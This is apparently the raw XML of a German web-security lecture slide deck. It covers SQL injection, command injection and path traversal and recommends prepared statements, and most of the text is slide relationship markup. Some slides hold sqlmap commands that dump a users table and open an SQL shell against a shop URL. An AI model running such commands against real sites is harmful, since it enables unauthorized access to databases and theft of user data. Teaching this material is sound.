            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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--tables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http://lightside.me/shop/blind.php?id=1 -D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lightside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -T users --dump</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -u http://lightside.me/shop/blind.php?id=1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lightside.users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2500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Einer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in den </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kommentaren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meint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ihm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in der </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nähe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> war und </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tatsächlich</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>geklappt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hat – bin mir da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so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sicher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> ^^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048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PINGO QUIZ: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>NoSQL, XML/XPATH , SMTP, LDAP, OS-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, ….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0004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497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4088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1993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76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 err="1"/>
              <a:t>path-traversal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haben wir hier auch! (ist aber in dem Fall das geringere Übel)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1566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https://portswigger.net/web-security/os-command-injection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952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85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9211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15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almost every programming language has a “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()” function -&gt; no need for a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command execution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913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076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mögliche</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ziele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bestehende</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>überschreiben</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, DoS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244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0753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9184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555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802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582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2835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190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309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0714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56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https://imgflip.com/memegenerator/Star-Wars-Yoda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472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424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37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18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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> eigentlich recht umständlich. Bei </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>pdo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> einfacher. Und bei anderen Sprachen erst recht einfacher.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9320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Aber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ORMs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aufpassen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erst </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>recht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vulnerable Statements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reinschreibt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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7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18.03.2022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png"/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5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.png"/><Relationship Id="rId671" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink370.xml"/><Relationship Id="rId769" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink419.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image130.png"/><Relationship Id="rId531" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink299.xml"/><Relationship Id="rId629" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink349.xml"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink100.xml"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink153.xml"/><Relationship Id="rId475" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink271.xml"/><Relationship Id="rId682" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image306.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink16.xml"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink79.xml"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink201.xml"/><Relationship Id="rId542" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image237.png"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink107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381.xml"/><Relationship Id="rId707" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink388.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image139.png"/><Relationship Id="rId553" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink310.xml"/><Relationship Id="rId760" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3451.png"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink115.xml"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink122.xml"/><Relationship Id="rId413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink240.xml"/><Relationship Id="rId497" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink282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212.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink27.xml"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink57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99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink233.xml"/><Relationship Id="rId564" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink316.xml"/><Relationship Id="rId771" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink420.xml"/><Relationship Id="rId827" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink448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350.xml"/><Relationship Id="rId673" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink371.xml"/><Relationship Id="rId729" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink399.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink154.xml"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image131.png"/><Relationship Id="rId533" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink300.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink80.xml"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image150.png"/><Relationship Id="rId575" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink322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101.xml"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink133.xml"/><Relationship Id="rId435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink251.xml"/><Relationship Id="rId477" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink272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202.xml"/><Relationship Id="rId502" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image217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55.png"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink223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410.xml"/><Relationship Id="rId793" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink431.xml"/><Relationship Id="rId807" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink438.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink109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340.xml"/><Relationship Id="rId653" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink361.xml"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink144.xml"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink165.xml"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink176.xml"/><Relationship Id="rId488" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image210.png"/><Relationship Id="rId695" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink382.xml"/><Relationship Id="rId709" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink389.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink48.xml"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink70.xml"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image140.png"/><Relationship Id="rId513" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink290.xml"/><Relationship Id="rId555" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink311.xml"/><Relationship Id="rId597" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink333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91.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink116.xml"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink123.xml"/><Relationship Id="rId415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink241.xml"/><Relationship Id="rId457" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink262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283.xml"/><Relationship Id="rId664" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image297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87.xml"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink213.xml"/><Relationship Id="rId524" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image228.png"/><Relationship Id="rId566" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink317.xml"/><Relationship Id="rId731" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink400.xml"/><Relationship Id="rId773" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink421.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink59.xml"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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351.xml"/><Relationship Id="rId829" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink449.xml"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink134.xml"/><Relationship Id="rId468" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image200.png"/><Relationship Id="rId675" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink372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55.xml"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image132.png"/><Relationship Id="rId535" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink301.xml"/><Relationship Id="rId577" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink323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81.xml"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink102.xml"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink224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252.xml"/><Relationship Id="rId479" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink273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18.xml"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image122.png"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink203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390.xml"/><Relationship Id="rId753" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink411.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink39.xml"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink62.xml"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink111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432.xml"/><Relationship Id="rId809" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink439.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink124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341.xml"/><Relationship Id="rId655" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink362.xml"/><Relationship Id="rId697" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink383.xml"/><Relationship Id="rId820" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image375.png"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink145.xml"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink166.xml"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink178.xml"/><Relationship Id="rId515" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink291.xml"/><Relationship Id="rId722" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image326.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink50.xml"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink71.xml"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink92.xml"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink214.xml"/><Relationship Id="rId557" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink312.xml"/><Relationship Id="rId599" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink334.xml"/><Relationship Id="rId764" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image347.png"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink117.xml"/><Relationship Id="rId417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink242.xml"/><Relationship Id="rId459" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink263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450.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink8.xml"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink189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9.xml"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image133.png"/><Relationship Id="rId568" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink318.xml"/><Relationship Id="rId733" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink401.xml"/><Relationship Id="rId775" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink422.xml"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67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352.xml"/><Relationship Id="rId677" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink373.xml"/><Relationship Id="rId800" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image365.png"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink135.xml"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink156.xml"/><Relationship Id="rId481" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink274.xml"/><Relationship Id="rId702" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31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82.xml"/><Relationship Id="rId537" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink302.xml"/><Relationship Id="rId579" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink324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41.xml"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink103.xml"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink204.xml"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink225.xml"/><Relationship Id="rId439" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink253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440.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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19.xml"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink64.xml"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink180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391.xml"/><Relationship Id="rId755" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink412.xml"/><Relationship Id="rId797" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink433.xml"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink52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342.xml"/><Relationship Id="rId822" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image376.png"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink125.xml"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink146.xml"/><Relationship Id="rId657" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink363.xml"/><Relationship Id="rId699" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink384.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink72.xml"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink167.xml"/><Relationship Id="rId461" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink264.xml"/><Relationship Id="rId517" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink292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30.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink93.xml"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink118.xml"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink191.xml"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink215.xml"/><Relationship Id="rId419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink243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451.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink9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402.xml"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink198.xml"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image153.png"/><Relationship Id="rId581" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink325.xml"/><Relationship Id="rId777" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink423.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink136.xml"/><Relationship Id="rId637" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink353.xml"/><Relationship Id="rId679" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink374.xml"/><Relationship Id="rId802" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image366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57.xml"/><Relationship Id="rId441" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink254.xml"/><Relationship Id="rId483" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink275.xml"/><Relationship Id="rId539" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink303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0.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink83.xml"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink104.xml"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink171.xml"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink205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43.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink226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441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392.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink66.xml"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink182.xml"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image143.png"/><Relationship Id="rId757" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink413.xml"/><Relationship Id="rId799" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink434.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink54.xml"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75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343.xml"/><Relationship Id="rId659" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink364.xml"/><Relationship Id="rId824" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image377.png"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink126.xml"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink147.xml"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink168.xml"/><Relationship Id="rId421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink244.xml"/><Relationship Id="rId463" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink265.xml"/><Relationship Id="rId519" 